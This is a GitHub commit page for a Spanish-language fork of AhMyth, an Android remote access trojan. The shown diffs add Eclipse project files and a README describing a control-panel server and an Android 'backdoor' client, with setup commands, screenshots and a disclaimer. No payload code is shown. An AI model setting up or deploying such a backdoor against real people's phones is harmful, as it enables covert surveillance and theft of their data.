This repository has been archived by the owner on Sep 3, 2021. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Soluciones: list dir, names, hide app
- Loading branch information
Showing
6 changed files
with
97 additions
and
10 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<projectDescription> | ||
<name>AhMyth-Client</name> | ||
<comment>Project AhMyth-Client created by Buildship.</comment> | ||
<projects> | ||
</projects> | ||
<buildSpec> | ||
<buildCommand> | ||
<name>org.eclipse.buildship.core.gradleprojectbuilder</name> | ||
<arguments> | ||
</arguments> | ||
</buildCommand> | ||
</buildSpec> | ||
<natures> | ||
<nature>org.eclipse.buildship.core.gradleprojectnature</nature> | ||
</natures> | ||
</projectDescription> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
connection.project.dir= | ||
eclipse.preferences.version=1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,66 @@ | ||
# AhMyth Android Rat | ||
###### Beta Version | ||
+ Repositorio original | ||
+ ```https://github.com/AhMyth/AhMyth-Android-RAT.git``` | ||
+ El repositorio actual corrige problemas comunes para su instalación en debian 10, también recopila pull requests aún no aprobado e incorpora nuevas funcionalidades. | ||
+ ```https://github.com/elcaza/AhMyth-Android-RAT``` | ||
|
||
|
||
Este proyecto consiste de dos partes | ||
* Servidor : Aplicación de escritorio basada en electron framework (control panel) | ||
* Cliente : Aplicación de android (backdoor) | ||
|
||
|
||
## Primeros pasos | ||
### Hay dos opciones para instalar la aplicación | ||
#### 1) Desde el código fuente | ||
###### Prerrequisitos : | ||
* Electron (to start the app) | ||
* Java 8 (to generate apk backdoor) | ||
* Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX)) | ||
1. ```git clone https://github.com/AhMyth/AhMyth-Android-RAT.git``` | ||
2. ```cd AhMyth-Android-RAT/AhMyth-Server``` | ||
3. ```npm start``` | ||
|
||
#### 2) Desde los binarios | ||
###### Prerequisite : | ||
* Descargar el binario desde https://github.com/AhMyth/AhMyth-Android-RAT/releases | ||
* Java (to generate apk backdoor) | ||
|
||
## Instalación de dependencias y solución a errores comunes | ||
+ Esto fue probado en el siguiente ambiente | ||
+ Debian 10 | ||
+ javac 8 | ||
|
||
|
||
|
||
|
||
## Screenshots | ||
<p align="center"> | ||
<img src="http://i.imgur.com/HM3uXL6.png" width="600"/> | ||
</p> | ||
|
||
--------------------------------------------------------------- | ||
|
||
<p align="center"> | ||
<img src="http://i.imgur.com/nHTGGHi.png" width="600"/> | ||
</p> | ||
|
||
--------------------------------------------------------------- | ||
|
||
<p align="center"> | ||
<img src="http://i.imgur.com/XVXCHV9.png" width="600"/> | ||
</p> | ||
|
||
|
||
## Video Tutorial | ||
<p align="center"> | ||
<a href="https://www.youtube.com/watch?v=DDIZTABABzs"> | ||
<img src="https://img.youtube.com/vi/DDIZTABABzs/0.jpg" width="600"/> | ||
</a></p> | ||
|
||
|
||
--------------------------------------------------------------- | ||
##### I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only. | ||
###### Twitter : <a href="https://twitter.com/AhMythDev"> @AhMythDev </a> | ||
###### Bitcoin address for donations: : 1EVwLuwmbsEuej7qJnNquFeQJLsgd2b8Lq |